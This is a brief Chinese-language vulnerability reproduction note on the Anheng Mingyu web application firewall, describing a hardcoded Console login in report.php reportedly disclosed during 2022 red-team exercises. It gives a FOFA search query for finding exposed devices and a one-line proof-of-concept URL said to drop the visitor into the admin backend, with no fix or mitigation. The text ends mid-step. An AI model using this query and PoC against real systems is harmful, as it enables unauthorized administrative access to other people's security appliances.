1.漏洞介绍
安恒明御WEB应用防火墙,后简称云WAF,实现对网站及APP业务流量进行多维度、深层次的安全检测和防护。智能语义分析 :智能语义分析引擎基于词法分析和语法分析的SQL注入/XSS攻击检测与防御引擎。,AI智能防护 :采用先进的机器学习算法,降低安全引擎的误报率和漏报率,实现对未知威胁的检测防护。,云端智能抗D:与云端高防中心进行联动,提供3-7层的DDOS防护,提供7X24小时全天候服务 。
2022HW期间爆出,report.php文件存在硬编码设置的Console用户登录,攻击者可以通过漏洞直接登录后台
2.影响版本
未知
3.漏洞复现
fofa语法:
app="安恒信息-明御WAF"
POC:
http://x.x.x.x/report.m?a=rpc-timed
再次访问主页即可跳转到后台页面: